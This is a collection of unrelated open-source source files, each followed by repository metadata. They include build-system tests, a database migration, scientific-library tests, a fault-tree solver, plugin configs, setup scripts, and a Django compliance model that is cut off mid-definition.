t.expect_nothing_more()
t.fail(t.read("bin/a.obj/yfc/debug/runtime-link-dynamic/a.obj") !=\
"""
<optimization>off <rtti>on <runtime-link>dynamic <toolset>yfc <variant>debug
a.cpp
""")
t.fail(t.read("auxillary/bin/b.obj/yfc/debug/runtime-link-dynamic/b.obj") !=\
"""
<optimization>space <rtti>on <runtime-link>dynamic <toolset>yfc <variant>debug
b.cpp
""")
t.fail(t.read("bin/a/yfc/debug/runtime-link-dynamic/a") !=\
"""
<optimization>off <rtti>on <runtime-link>dynamic <toolset>yfc <variant>debug
<optimization>off <rtti>on <runtime-link>dynamic <toolset>yfc <variant>debug
a.cpp
<optimization>space <rtti>on <runtime-link>dynamic <toolset>yfc <variant>debug
b.cpp
""")
# Check that we have vanilla target names available in subdirs
t.touch("auxillary/b.cpp")
t.run_build_system("-sTOOLSET b.obj", subdir="auxillary")
t.expect_touch("auxillary/bin/b.obj/yfc/debug/runtime-link-dynamic/optimization-space/b.obj")
t.expect_no_modification("bin/a.obj/yfc/debug/runtime-link-dynamic/a.obj")
t.expect_no_modification("bin/a/yfc/debug/runtime-link-dynamic/a")
# Check that we cannot request link-incompatible property for source target
t.write('Jamfile', t.read('Jamfile2'))
stdout="""Error: subvariant of target ./a with properties
<optimization>off <rtti>on <runtime-link>dynamic <toolset>yfc <variant>debug
requests link-incompatible property
<rtti>off
for source @auxillary/b.obj
"""
t.run_build_system("-sTOOLSET=yfc", stdout=stdout)
# Check that if we request link-compatible property then requirement for
# the source target will override it, with warning. This is similar to
# the way build requests are satisfied (see the first test)
# CONSIDER: should we print the main target which requests this one
# (and modifies requirements)?
t.write('Jamfile3', t.read('Jamfile3'))
t.write('auxillary/Jamfile3', t.read('auxillary/Jamfile3'))
stdout="""Warning: cannot exactly satisfy request for auxillary/b.obj with properties
<optimization>space <rtti>on <runtime-link>dynamic <toolset>yfc <variant>debug
Using
<optimization>speed <rtti>on <runtime-link>dynamic <toolset>yfc <variant>debug
instead.
"""
t.run_build_system("-sTOOLSET=yfc", stdout=stdout)
# Check for link-incompatible properties
t.write('Jamfile4', t.read('Jamfile4'))
t.write('auxillary/Jamfile4', t.read('auxillary/Jamfile4'))
stdout="""Warning: cannot satisfy request for auxillary/b.obj with properties
<optimization>space <rtti>on <runtime-link>dynamic <toolset>yfc <variant>debug
Nothing will be built.
""")
t.pass_test()
| gorkinovich/DefendersOfMankind | dependencies/luabind/boost-build/test/m1-02.py | Python | gpl-3.0 | 3,178 |
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import sqlalchemy
from heat.db.sqlalchemy import types as heat_db_types
def upgrade(migrate_engine):
meta = sqlalchemy.MetaData(bind=migrate_engine)
stack = sqlalchemy.Table('stack', meta, autoload=True)
tags = sqlalchemy.Column('tags', heat_db_types.Json)
tags.create(stack)
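# Hedged note: tags.create() is the sqlalchemy-migrate column API; the rough
# Alembic equivalent would be
#   op.add_column('stack', sqlalchemy.Column('tags', heat_db_types.Json))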
| dragorosson/heat | heat/db/sqlalchemy/migrate_repo/versions/050_stack_tags.py | Python | apache-2.0 | 871 |
# (C) British Crown Copyright 2010 - 2017, Met Office
#
# This file is part of Iris.
#
# Iris is free software: you can redistribute it and/or modify it under
# the terms of the GNU Lesser General Public License as published by the
# Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Iris is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Iris. If not, see <http://www.gnu.org/licenses/>.
"""
This system test module is useful to identify if some of the key components required for Iris are available.
The system tests can be run with ``python setup.py test --system-tests``.
"""
from __future__ import (absolute_import, division, print_function)
from six.moves import (filter, input, map, range, zip) # noqa
# import iris tests first so that some things can be initialised before importing anything else
import cf_units
import numpy as np
import iris
import iris.fileformats.netcdf as netcdf
import iris.fileformats.pp as pp
import iris.tests as tests
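# Note: the netcdf and pp imports above double as availability checks for the
# file-format components this system test exercises; they are otherwise unused.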
class SystemInitialTest(tests.IrisTest):
def system_test_supported_filetypes(self):
nx, ny = 60, 60
data = np.arange(nx * ny, dtype='>f4').reshape(nx, ny)
laty = np.linspace(0, 59, ny).astype('f8')
lonx = np.linspace(30, 89, nx).astype('f8')
horiz_cs = lambda : iris.coord_systems.GeogCS(6371229)
cm = iris.cube.Cube(data, 'wind_speed', units='m s-1')
cm.add_dim_coord(
iris.coords.DimCoord(laty, 'latitude', units='degrees',
coord_system=horiz_cs()),
0)
cm.add_dim_coord(
iris.coords.DimCoord(lonx, 'longitude', units='degrees',
coord_system=horiz_cs()),
1)
cm.add_aux_coord(iris.coords.AuxCoord(np.array([9], 'i8'),
'forecast_period', units='hours'))
hours_since_epoch = cf_units.Unit('hours since epoch',
cf_units.CALENDAR_GREGORIAN)
cm.add_aux_coord(iris.coords.AuxCoord(np.array([3], 'i8'),
'time', units=hours_since_epoch))
cm.add_aux_coord(iris.coords.AuxCoord(np.array([99], 'i8'),
long_name='pressure', units='Pa'))
filetypes = ('.nc', '.pp')
if tests.GRIB_AVAILABLE:
filetypes += ('.grib2',)
for filetype in filetypes:
saved_tmpfile = iris.util.create_temp_filename(suffix=filetype)
iris.save(cm, saved_tmpfile)
new_cube = iris.load_cube(saved_tmpfile)
self.assertCML(new_cube,
('system',
'supported_filetype_%s.cml' % filetype))
@tests.skip_grib
def system_test_grib_patch(self):
import gribapi
gm = gribapi.grib_new_from_samples("GRIB2")
result = gribapi.grib_get_double(gm, "missingValue")
new_missing_value = 123456.0
gribapi.grib_set_double(gm, "missingValue", new_missing_value)
new_result = gribapi.grib_get_double(gm, "missingValue")
self.assertEqual(new_result, new_missing_value)
def system_test_imports_general(self):
if tests.MPL_AVAILABLE:
import matplotlib
import netCDF4
if __name__ == '__main__':
tests.main()
| QuLogic/iris | lib/iris/tests/system_test.py | Python | gpl-3.0 | 3,658 |
#################################################################################
# This file is the ftsolver module, which solves fault trees.
# It was developed by Paul S. Boneham. Copyright (C) 2015 Paul S. Boneham
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
##################################################################################
import networkx
import matplotlib.pyplot as plt
import itertools
import ft_import
def minimalise(ft):
cs_tops = ft.successors("SOLUTION_TOP")
combs = itertools.product(cs_tops, cs_tops)
for comb in combs:
if comb[0] == comb[1]:
continue
cs_entries0 = ft.successors(comb[0])
cs_entries1 = ft.successors(comb[1])
if len(cs_entries0) < len(cs_entries1):
remove = 1
for entry in cs_entries0:
if entry not in cs_entries1:
remove = -1
break
else:
remove = 0
for entry in cs_entries1:
if entry not in cs_entries0:
remove = -1
break
if remove == 0:
try:
ft.remove_edge("SOLUTION_TOP",comb[0])
except:
pass
if remove == 1:
try:
ft.remove_edge("SOLUTION_TOP",comb[1])
except:
pass
def solve(ft):
# identify top gate
for node in networkx.nodes(ft):
if ft.node[node]["top"] == 1:
top = node
break
print top
tmp = ft.node[top]["gtype"]
solution_top = "SOLUTION_TOP"
ft.add_node(solution_top, gtype="OR", module = "", top=2) # 2 means solution top
ft.add_node("CS_TOP_1",gtype = "AND", module = "", top = 3) # 3 means it holds a cutset
ft.add_edge(solution_top,"CS_TOP_1")
ft.add_edge("CS_TOP_1", top)
# now ready to start iterating
counter = 1
iter_count = 0
while 1:
cs_tops = ft.successors(solution_top)
iter_count += 1
print "Iter count", iter_count
new_cs_tops = []
gate_count = 0
for cs_top in cs_tops:
cs_entries = ft.successors(cs_top)
for cs_entry in cs_entries:
if ft.node[cs_entry]["gtype"] == "AND":
gate_count += 1
# need to disconnect the entry and connect its children
children = ft.successors(cs_entry)
for child in children:
ft.add_edge(cs_top, child)
ft.remove_edge(cs_top, cs_entry)
if ft.node[cs_entry]["gtype"] == "OR":
gate_count += 1
# or gate leads to adding new cs_tops
children = ft.successors(cs_entry)
done_first = 0
for child in children:
if done_first == 0:
# add first child to current cs top
ft.add_edge(cs_top, child)
ft.remove_edge(cs_top, cs_entry)
done_first += 1
else:
# otherwise generate new tops
counter += 1
s = "CS_TOP_" + str(counter)
print "CS top to add:", s
tmp = [s]
tmp.append(child)
for tmp_entry in cs_entries:
if tmp_entry != cs_entry:
tmp.append(tmp_entry)
new_cs_tops.append(tmp)
# add extra nodes
for entry in new_cs_tops:
ft.add_node(entry[0])
ft.add_edge(solution_top, entry[0])
for cs_entry in entry[1:]:
ft.add_edge(entry[0], cs_entry)
minimalise(ft)
print "Gate count =", gate_count
if gate_count == 0: # this is how we get out!
break
def createFT():
ft = networkx.DiGraph()
# create gates
ft.add_node("G1", gtype = "AND", module="", top=1, ref_count = 0)
ft.add_node("G2", gtype = "OR", module="", top=0, ref_count = 0)
ft.add_node("G3", gtype = "AND", module="", top=0, ref_count = 0)
#ft.add_node("G4", gtype = "OR", module="", top=0, ref_count = 0)
#ft.add_node("G5", gtype = "OR", module="", top=0, ref_count = 0)
# create BEs
ft.add_node("BE1", gtype = "BE")
ft.add_node("BE2", gtype = "BE")
ft.add_node("BE3", gtype = "BE")
ft.add_node("BE4", gtype = "BE")
ft.add_node("BE5", gtype = "BE")
ft.add_node("BE6", gtype = "BE")
ft.add_node("BE7", gtype = "BE")
# add inputs (add edges) - from (gate) to (input)
ft.add_edge("G1","BE1")
ft.add_edge("G1","G2")
ft.add_edge("G2","BE2")
ft.add_edge("G2","BE3")
ft.add_edge("G2","G3")
ft.add_edge("G3","BE3")
ft.add_edge("G3","BE2")
ft.add_edge("G3","BE4")
#ft.add_edge("G4","BE4")
#ft.add_edge("G4","BE6")
#ft.add_edge("G4","BE7")
#ft.add_edge("G5","BE5")
#ft.add_edge("G5","BE2")
for n in networkx.nodes(ft):
ft.node[n]["ref_count"] = len(ft.predecessors(n))
print n, ft.node[n]["ref_count"]
return ft
################## tree class is used as interface to frontend #####
class tree:
def __init__(self):
self.ft = createFT()
## end method ##
def create_from_ft(self, f):
pass
    def print_tree(self):
        #print networkx.info(self.ft)
        #print networkx.nodes(self.ft)
        # print out tree: one minimal cutset per line
        cs_tops = self.ft.successors("SOLUTION_TOP")
        for cs_top in cs_tops:
            print cs_top,
            cs_entries = self.ft.successors(cs_top)
            for entry in cs_entries:
                print entry,
            print
        networkx.draw(self.ft)
        plt.show()
## end method ##
def print_gate(self, name=None):
pass
## end method ##
def solve(self, gate=None):
solve(self.ft)
## end method ##
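if __name__ == "__main__":
    # Hedged demo: build the hard-coded example tree, solve it and print the
    # minimal cutsets (print_tree also draws the graph, which needs a display).
    t = tree()
    t.solve()
    t.print_tree()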
| pboneham/fault_tree_solver | fault_tree_nwx.py | Python | agpl-3.0 | 6,929 |
# encoding: utf-8
def fizzbuzz(number):
pass
| haikoschol/kata_quickstart | python/kata.py | Python | mit | 51 |
from .main import Boxcar2
def start():
return Boxcar2()
config = [{
'name': 'boxcar2',
'groups': [
{
'tab': 'notifications',
'list': 'notification_providers',
'name': 'boxcar2',
'options': [
{
'name': 'enabled',
'default': 0,
'type': 'enabler',
},
{
'name': 'token',
'description': ('Your Boxcar access token.', 'Can be found in the app under settings')
},
{
'name': 'on_snatch',
'default': 0,
'type': 'bool',
'advanced': True,
'description': 'Also send message when movie is snatched.',
},
],
}
],
}]
| entomb/CouchPotatoServer | couchpotato/core/notifications/boxcar2/__init__.py | Python | gpl-3.0 | 893 |
from setuptools import setup
setup(
name='scrutiny',
version='0.0.1',
description='',
author='Luke Macken',
author_email='lmacken@redhat.com',
url='https://github.com/lmacken/scrutiny',
install_requires=["fedmsg"],
packages=[],
entry_points="""
[moksha.consumer]
scm_consumer = scrutiny.scm_consumer:SCMConsumer
""",
)
| lmacken/scrutiny | setup.py | Python | gpl-3.0 | 368 |
import RPi.GPIO as GPIO
import time
GPIO.setmode(GPIO.BOARD)
GPIO.setup(16, GPIO.IN)
count = 0
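# Poll the pin in a loop; the extra 0.3 s sleep after a press is a crude
# software debounce so one press is not counted multiple times.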
try:
while True:
inputValue = GPIO.input(16)
        if inputValue:
count = count + 1
print("Button pressed " + str(count) + " times.")
time.sleep(.3)
time.sleep(0.25)
except KeyboardInterrupt:
pass
GPIO.cleanup() | IanMezza/GPIO-101 | basicUsage/button.py | Python | mit | 327 |
import serial
import csv
ser = serial.Serial()
millis = 0
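# Note: despite the name, millis counts readline() calls (rows written),
# not elapsed milliseconds.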
port = input('COM Port [10]: ') or 10
destination = input('Output File [./data.csv]: ') or './data.csv'
ser.port = int(port)
ser.open()
with open(destination, 'w', encoding='utf8', newline='') as f:
writer = csv.writer(f)
while True:
str = ser.readline()
millis += 1
print(str)
writer.writerow([str,millis])
| bmacdona9517/ISS-maintainSpeed | util/SerialLogger/SerialLogger.py | Python | mit | 412 |
"""
Test APIs.
"""
import json
import pytest
from mock import patch
from coursera import api
from coursera.test.utils import slurp_fixture
@pytest.fixture
def course():
course = api.CourseraOnDemand(session=None, course_id='0')
return course
@patch('coursera.api.get_page_json')
def test_ondemand_programming_supplement_no_instructions(get_page_json, course):
no_instructions = slurp_fixture('json/supplement-programming-no-instructions.json')
get_page_json.return_value = json.loads(no_instructions)
output = course.extract_links_from_programming('0')
assert {} == output
@patch('coursera.api.get_page_json')
def test_ondemand_programming_supplement_empty_instructions(get_page_json, course):
empty_instructions = slurp_fixture('json/supplement-programming-empty-instructions.json')
get_page_json.return_value = json.loads(empty_instructions)
output = course.extract_links_from_programming('0')
# Make sure that SOME html content has been extracted, but remove
# it immeditely because it's a hassle to properly prepare test input
# for it. FIXME later.
assert 'html' in output
del output['html']
assert {} == output
@patch('coursera.api.get_page_json')
def test_ondemand_programming_supplement_one_asset(get_page_json, course):
one_asset_tag = slurp_fixture('json/supplement-programming-one-asset.json')
one_asset_url = slurp_fixture('json/asset-urls-one.json')
asset_json = json.loads(one_asset_url)
get_page_json.side_effect = [json.loads(one_asset_tag),
json.loads(one_asset_url)]
expected_output = {'pdf': [(asset_json['elements'][0]['url'],
'statement-pca')]}
output = course.extract_links_from_programming('0')
# Make sure that SOME html content has been extracted, but remove
# it immeditely because it's a hassle to properly prepare test input
# for it. FIXME later.
assert 'html' in output
del output['html']
assert expected_output == output
@patch('coursera.api.get_page_json')
def test_ondemand_programming_supplement_three_assets(get_page_json, course):
three_assets_tag = slurp_fixture('json/supplement-programming-three-assets.json')
three_assets_url = slurp_fixture('json/asset-urls-three.json')
get_page_json.side_effect = [json.loads(three_assets_tag),
json.loads(three_assets_url)]
expected_output = json.loads(slurp_fixture('json/supplement-three-assets-output.json'))
output = course.extract_links_from_programming('0')
output = json.loads(json.dumps(output))
# Make sure that SOME html content has been extracted, but remove
# it immeditely because it's a hassle to properly prepare test input
# for it. FIXME later.
assert 'html' in output
del output['html']
assert expected_output == output
@patch('coursera.api.get_page_json')
def test_extract_links_from_lecture_assets_typename_asset(get_page_json, course):
open_course_assets_reply = slurp_fixture('json/supplement-open-course-assets-reply.json')
api_assets_v1_reply = slurp_fixture('json/supplement-api-assets-v1-reply.json')
get_page_json.side_effect = [json.loads(open_course_assets_reply),
json.loads(api_assets_v1_reply)]
expected_output = json.loads(slurp_fixture('json/supplement-extract-links-from-lectures-output.json'))
assets = ['giAxucdaEeWJTQ5WTi8YJQ']
output = course._extract_links_from_lecture_assets(assets)
output = json.loads(json.dumps(output))
assert expected_output == output
@patch('coursera.api.get_page_json')
def test_extract_links_from_lecture_assets_typname_url_and_asset(get_page_json, course):
"""
This test makes sure that _extract_links_from_lecture_assets grabs url
links both from typename == 'asset' and == 'url'.
"""
get_page_json.side_effect = [
json.loads(slurp_fixture('json/supplement-open-course-assets-typename-url-reply-1.json')),
json.loads(slurp_fixture('json/supplement-open-course-assets-typename-url-reply-2.json')),
json.loads(slurp_fixture('json/supplement-open-course-assets-typename-url-reply-3.json')),
json.loads(slurp_fixture('json/supplement-open-course-assets-typename-url-reply-4.json')),
json.loads(slurp_fixture('json/supplement-open-course-assets-typename-url-reply-5.json')),
]
expected_output = json.loads(slurp_fixture('json/supplement-extract-links-from-lectures-url-asset-output.json'))
assets = ['Yry0spSKEeW8oA5fR3afVQ',
'kMQyUZSLEeWj-hLVp2Pm8w',
'xkAloZmJEeWjYA4jOOgP8Q']
output = course._extract_links_from_lecture_assets(assets)
output = json.loads(json.dumps(output))
assert expected_output == output
| iemejia/coursera-dl | coursera/test/test_api.py | Python | lgpl-3.0 | 4,808 |
import numpy as np
from btgym.algorithms.utils import batch_stack, batch_gather, _show_struct
from btgym.research.gps.aac import GuidedAAC
from btgym.algorithms.runner.synchro import BaseSynchroRunner
class AACt2d(GuidedAAC):
"""
Trajectory2Distribution:
AAC class including methods enabling treating collected train data as empirical distribution rather than trajectory.
Note:
time_flat=True is a key ingredient here. See BaseAAC notes for details.
"""
def __init__(
self,
runner_config=None,
name='AAC_T2D',
**kwargs
):
try:
if runner_config is None:
kwargs['runner_config'] = {
'class_ref': BaseSynchroRunner,
'kwargs': {
'data_sample_config': {'mode': 0},
'name': 't2d_synchro',
},
}
else:
kwargs['runner_config'] = runner_config
kwargs.update(
{
'time_flat': True,
'name': name,
'_aux_render_modes': ('action_prob', 'value_fn', 'lstm_1_h', 'lstm_2_h'),
}
)
super(AACt2d, self).__init__(**kwargs)
self.on_policy_batch = None
self.off_policy_batch = None
self.rp_batch = None
except:
msg = 'AAC_T2D.__init__() exception occurred' + \
'\n\nPress `Ctrl-C` or jupyter:[Kernel]->[Interrupt] for clean exit.\n'
self.log.exception(msg)
raise RuntimeError(msg)
def get_episode(self, **kwargs):
"""
        Collect one episode from every runner and merge the results key-wise.
        Args:
            **kwargs: see env.reset() method
        Returns:
            dict mapping every rollout key to a list with one entry per runner
        """
data_streams = [runner.get_episode(**kwargs) for runner in self.runners]
return {key: [stream[key] for stream in data_streams] for key in data_streams[0].keys()}
def get_batch(self, **kwargs):
"""
Retrieves batch of rollouts from runners.
Args:
**kwargs: see runner.get_batch() method.
Returns:
dictionary of batched rollouts
"""
rollouts = []
terminal_context = []
for runner in self.runners:
batch = runner.get_batch(**kwargs)
for rollout in batch['data']:
rollouts.append(rollout)
for context in batch['terminal_context']:
terminal_context.append(context)
self.log.debug('rollouts_len: {}'.format(len(rollouts)))
final_batch = {key: [rollout[key] for rollout in rollouts] for key in rollouts[0].keys()}
final_batch['terminal_context'] = terminal_context
return final_batch
@staticmethod
def sample_batch(batch, sample_size):
"""
Uniformly randomly samples mini-batch from (supposedly bigger) batch.
Args:
batch: nested dict of experiences
sample_size: mini-batch size
Returns:
nested dict of experiences of same structure as `batch` with number of experiences eq. to `sample_size`.
"""
if batch is not None:
batch_size = batch['time_steps'].shape[0]
indices = np.random.randint(0, batch_size, size=sample_size)
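            # Note: np.random.randint draws indices with replacement, so an
            # experience may appear more than once in the mini-batch.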
return batch_gather(batch, indices)
else:
return None
def process_batch(self, sess, data):
"""
Processes batched rollouts.
Makes every experience independent, enabling further shuffling or sampling.
Args:
sess: tf session obj.
data (dict): data dictionary
is_train (bool): is data provided are train or test
Returns:
on-policy [, off-policy and rp] processed batched data.
"""
# Process minibatch for on-policy train step:
on_policy_batch = self._process_rollouts(data['on_policy'])
if self.use_memory:
# Process rollouts from replay memory:
off_policy_batch = self._process_rollouts(data['off_policy'])
if self.use_reward_prediction:
# Rebalanced 50/50 sample for RP:
rp_rollouts = data['off_policy_rp']
rp_batch = batch_stack([rp.process_rp(self.rp_reward_threshold) for rp in rp_rollouts])
else:
rp_batch = None
else:
off_policy_batch = None
rp_batch = None
return on_policy_batch, off_policy_batch, rp_batch
@staticmethod
def _check(batch):
"""
Debug. utility.
"""
print('Got data_dict:')
for key in batch.keys():
try:
shape = np.asarray(batch[key]).shape
except:
shape = '???'
print('key: {}, shape: {}'.format(key, shape))
def process(self, sess, **kwargs):
"""
Usage example. Override.
"""
try:
# Collect train trajectories:
train_data_batch = self.get_batch(size=30, require_terminal=True)
self._check(train_data_batch)
#print('train_data_batch_ep_summary: ', train_data_batch['ep_summary'])
#print('train_data_batch_render_summary: ', train_data_batch['render_summary'])
# Process time-flat alike (~iid) to treat as empirical data distribution over train task:
self.on_policy_batch, self.off_policy_batch, self.rp_batch = self.process_batch(sess, train_data_batch)
#self._check(self.on_policy_batch)
print('on_p_batch_size: {}'.format(self.on_policy_batch['batch_size']))
            # Perform updates on mini-batches sampled from the processed data.
            # Sample random batch of train data from train task:
on_policy_mini_batch = self.sample_batch(self.on_policy_batch, 17)
#self._check(on_policy_mini_batch)
print('on_p_mini_batch_size: {}'.format(on_policy_mini_batch['batch_size']))
feed_dict = self._get_main_feeder(sess, on_policy_mini_batch, None, None, True)
#self._check(feed_dict)
except:
msg = 'process() exception occurred' + \
'\n\nPress `Ctrl-C` or jupyter:[Kernel]->[Interrupt] for clean exit.\n'
self.log.exception(msg)
raise RuntimeError(msg)
| Kismuz/btgym | btgym/research/metalearn_2/_aac_t2d.py | Python | lgpl-3.0 | 6,491 |
# -*- coding: utf-8 -*-
from domo import DomoDB, DomoSensor, DomoListener, DomoLog, DomoWatchdog
from multiprocessing import Process
import sys
class DomoApp:
def __init__(self):
pass
def run(self):
        '''start the worker processes; the listener start is currently
        commented out, so only the watchdog is launched'''
# self.listener_process = Process(target=self.start_listener)
# self.listener_process.daemon = True
# self.listener_process.start()
self.watchdog_process = Process(target=self.start_watchdog)
self.watchdog_process.daemon = True
self.watchdog_process.start()
def start_listener(self):
'''method which starts the DomoListener thread'''
try:
mylistener = DomoListener.DomoListener()
mylistener.run()
except:
print "FATAL: {0}".format(sys.exc_info()[0])
return 1
def start_watchdog(self):
'''method which starts the DomoWatchdog thread'''
try:
mywatchdog = DomoWatchdog.DomoWatchdog()
mywatchdog.run()
except:
print "FATAL: {0}".format(sys.exc_info()[0])
return 1
def cleanup(self):
DomoLog.log('INFO', 'app', 'exiting')
| iFabio2/domo | src/domo/DomoApp.py | Python | apache-2.0 | 1,244 |
#!/usr/bin/env python
from setuptools import setup
short_description = 'Robot Framework Jalali Date'
try:
description = open('README.rst').read()
except IOError:
description = short_description
classifiers = """
Development Status :: 5 - Production/Stable
License :: OSI Approved :: MIT License
Operating System :: OS Independent
Programming Language :: Python :: 2.7
Topic :: Software Development :: Testing
Topic :: Software Development :: Quality Assurance
""".strip().splitlines()
setup(
name='robotframework-jalali',
package_dir={'': 'robotframework-jalali'},
packages=['jalaliLibrary'], # this must be the same as the name above
version='0.1.1',
description=short_description,
author='samira esnaashari',
author_email='samir.esnaashari@gmail.com',
url='https://github.com/samira-esnaashari/robotframework-jalali',
download_url='https://pypi.python.org/pypi/robotframework-jalali',
keywords=('robotframework testing '
'test automation testautomation '
'atdd bdd jalali'), # arbitrary keywords
install_requires=[],
long_description=description,
license='MIT',
classifiers=classifiers,
platforms='any'
) | samira-esnaashari/robotframework-jalali | setup.py | Python | mit | 1,208 |
#-*- coding:utf-8 -*-
import subprocess
from ErrorGenerator import ErrorGenerator
class PerlErrorGenerator(ErrorGenerator):
command = ["perl", "-wc"]
startFilePath = False
parseRegex = "(.*) line ([0-9]+)\.$"
lineIndex = 2
messageIndex = 1
stdout = None
stderr = subprocess.PIPE
| utisam/gfly | gfly/generators/PerlErrorGenerator.py | Python | gpl-3.0 | 287 |
import os,sys,glob
TSPROOT = os.getcwd()
XTOSDEFAULTS="W:\\bin\\XTOS\\4.1.P01"
TSPCLASSPATH = ''
TSPCLASSPATH += TSPROOT + '\\classes;'
#adding library files for TSP
TSPLIBPath = TSPROOT + '\\lib'
print TSPLIBPath
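# Collect every jar under lib/ into the classpath (Windows ';' separators).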
TSPCLASSPATH += ';'.join(['%s\\%s'%(TSPLIBPath,jar) for jar in glob.glob1(TSPLIBPath,'*.jar')])
TSPCLASSPATH += ';'
TSPCLASSPATH += XTOSDEFAULTS + '\\corba-java;'
TSPCLASSPATH += XTOSDEFAULTS + '\\native-java;'
TSPCLASSPATH += XTOSDEFAULTS+'\\java;'
TSPCLASSPATH += XTOSDEFAULTS+'\\bin'
varString = ''
varString += '-DTSPCLASSPATH=' + TSPCLASSPATH + ' '
varString += '-DTSPXMLPATH=' + TSPROOT + '\\..\\CPGTSPXML\\TSPMain.xml' + ' '
varString += '-DNLDXMLPATH=' + TSPROOT + '\\..\\CPGTSPXML\\NLDConfig.xml' + ' '
varString += '-DTSPHOME=' + TSPROOT + ' '
varString += '-DCLASSPATH=' + TSPCLASSPATH + ' '
os.environ['CLASSPATH']=TSPCLASSPATH
#java_str ="start javaw " + varString + " tspStarter"
java_str ="java -Xmx128M " + varString + " tspStarter"
print java_str
os.system(java_str)
| guanghaofan/MyTSP | 2.1.1.2/CPGTSP/reStartTSP.py | Python | gpl-2.0 | 1,009 |
from django.conf.urls.defaults import patterns, url
import views
urlpatterns = patterns('',
url('^openid/login/$', views.login, name="openid_login"),
url('^openid/callback/$', views.callback),
)
| GinnyN/towerofdimensions-django | django-allauth/build/lib/allauth/socialaccount/providers/openid/urls.py | Python | bsd-3-clause | 266 |
# Copyright (C) 2016 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
"""Module for control model and related classes."""
from sqlalchemy.ext.declarative import declared_attr
from sqlalchemy.orm import validates
from ggrc import db
from ggrc.models.audit_object import Auditable
from ggrc.models.categorization import Categorizable
from ggrc.models.category import CategoryBase
from ggrc.models.mixins import BusinessObject
from ggrc.models.mixins import CustomAttributable
from ggrc.models.mixins import Hierarchical
from ggrc.models.mixins import TestPlanned
from ggrc.models.mixins import Timeboxed
from ggrc.models.deferred import deferred
from ggrc.models.object_document import Documentable
from ggrc.models.object_owner import Ownable
from ggrc.models.object_person import Personable
from ggrc.models.option import Option
from ggrc.models.person import Person
from ggrc.models.reflection import PublishOnly
from ggrc.models.relationship import Relatable
from ggrc.models.track_object_state import HasObjectState
from ggrc.models.track_object_state import track_state_for_class
from ggrc.models.utils import validate_option
class ControlCategory(CategoryBase):
__mapper_args__ = {
'polymorphic_identity': 'ControlCategory'
}
_table_plural = 'control_categories'
class ControlAssertion(CategoryBase):
__mapper_args__ = {
'polymorphic_identity': 'ControlAssertion'
}
_table_plural = 'control_assertions'
class ControlCategorized(Categorizable):
@declared_attr
def categorizations(cls):
return cls.declare_categorizable(
"ControlCategory", "category", "categories", "categorizations")
_publish_attrs = [
'categories',
PublishOnly('categorizations'),
]
_include_links = []
_aliases = {
"categories": {
"display_name": "Categories",
"filter_by": "_filter_by_categories",
},
}
@classmethod
def _filter_by_categories(cls, predicate):
return cls._filter_by_category("ControlCategory", predicate)
@classmethod
def eager_query(cls):
from sqlalchemy import orm
query = super(ControlCategorized, cls).eager_query()
return query.options(
orm.subqueryload('categorizations').joinedload('category'),
)
class AssertionCategorized(Categorizable):
@declared_attr
def categorized_assertions(cls):
return cls.declare_categorizable(
"ControlAssertion", "assertion", "assertions",
"categorized_assertions")
_publish_attrs = [
'assertions',
PublishOnly('categorized_assertions'),
]
_include_links = []
_aliases = {
"assertions": {
"display_name": "Assertions",
"filter_by": "_filter_by_assertions",
},
}
@classmethod
def _filter_by_assertions(cls, predicate):
return cls._filter_by_category("ControlAssertion", predicate)
@classmethod
def eager_query(cls):
from sqlalchemy import orm
query = super(AssertionCategorized, cls).eager_query()
return query.options(
orm.subqueryload('categorized_assertions').joinedload('category'),
)
class Control(HasObjectState, Relatable, CustomAttributable, Documentable,
Personable, ControlCategorized, AssertionCategorized,
Hierarchical, Timeboxed, Ownable, Auditable,
TestPlanned, BusinessObject, db.Model):
__tablename__ = 'controls'
company_control = deferred(db.Column(db.Boolean), 'Control')
directive_id = deferred(
db.Column(db.Integer, db.ForeignKey('directives.id')), 'Control')
kind_id = deferred(db.Column(db.Integer), 'Control')
means_id = deferred(db.Column(db.Integer), 'Control')
version = deferred(db.Column(db.String), 'Control')
documentation_description = deferred(db.Column(db.Text), 'Control')
verify_frequency_id = deferred(db.Column(db.Integer), 'Control')
fraud_related = deferred(db.Column(db.Boolean), 'Control')
key_control = deferred(db.Column(db.Boolean), 'Control')
active = deferred(db.Column(db.Boolean), 'Control')
principal_assessor_id = deferred(
db.Column(db.Integer, db.ForeignKey('people.id')), 'Control')
secondary_assessor_id = deferred(
db.Column(db.Integer, db.ForeignKey('people.id')), 'Control')
principal_assessor = db.relationship(
'Person', uselist=False, foreign_keys='Control.principal_assessor_id')
secondary_assessor = db.relationship(
'Person', uselist=False, foreign_keys='Control.secondary_assessor_id')
kind = db.relationship(
'Option',
primaryjoin='and_(foreign(Control.kind_id) == Option.id, '
'Option.role == "control_kind")',
uselist=False)
means = db.relationship(
'Option',
primaryjoin='and_(foreign(Control.means_id) == Option.id, '
'Option.role == "control_means")',
uselist=False)
verify_frequency = db.relationship(
'Option',
primaryjoin='and_(foreign(Control.verify_frequency_id) == Option.id, '
'Option.role == "verify_frequency")',
uselist=False)
@staticmethod
def _extra_table_args(_):
return (
db.Index('ix_controls_principal_assessor', 'principal_assessor_id'),
db.Index('ix_controls_secondary_assessor', 'secondary_assessor_id'),
)
# REST properties
_publish_attrs = [
'active',
'company_control',
'directive',
'documentation_description',
'fraud_related',
'key_control',
'kind',
'means',
'verify_frequency',
'version',
'principal_assessor',
